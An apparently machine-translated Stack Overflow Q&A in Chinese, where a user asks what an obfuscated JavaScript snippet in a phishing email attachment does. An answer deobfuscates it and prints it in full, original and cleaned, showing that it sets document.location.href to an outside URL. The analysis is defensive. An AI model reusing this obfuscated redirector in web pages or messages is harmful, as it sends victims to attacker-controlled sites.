hal*_*ter 6 javascript phishing
我的一些非IT同事在电子邮件中打开了一个非常可疑的.html附件.当看起来运行了一些javascript代码时,它导致了一个空白屏幕.
<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>
它做了什么?这超出了我的编程知识范围.
Lau*_*nen 19
它会重定向到一个网址," http://lendermedia.com/images/z.htm "(请自行承担风险).
将代码复制并粘贴到有价值的JavaScript编辑器中,然后为您格式化源代码.
关键点:
var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');
h将等于' http://lendermedia.com/images/z.htm '
t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
t 将包含对的引用 document.location
b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
名为hrefof 的属性b,此时(在另一个函数内)实际上t来自上述语句,设置为hurl.
大多数代码仅仅是噪音,实际功能包括:
function uK() {
};
uK.prototype = {
f : function() {
var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'
.replace(/[\^H\!9X]/g, '');
t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];
function x(b) {
b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h;
}
x(t);
}
};
var tL = new uK();
tL.f();
| 归档时间: |
|
| 查看次数: |
1899 次 |
| 最近记录: |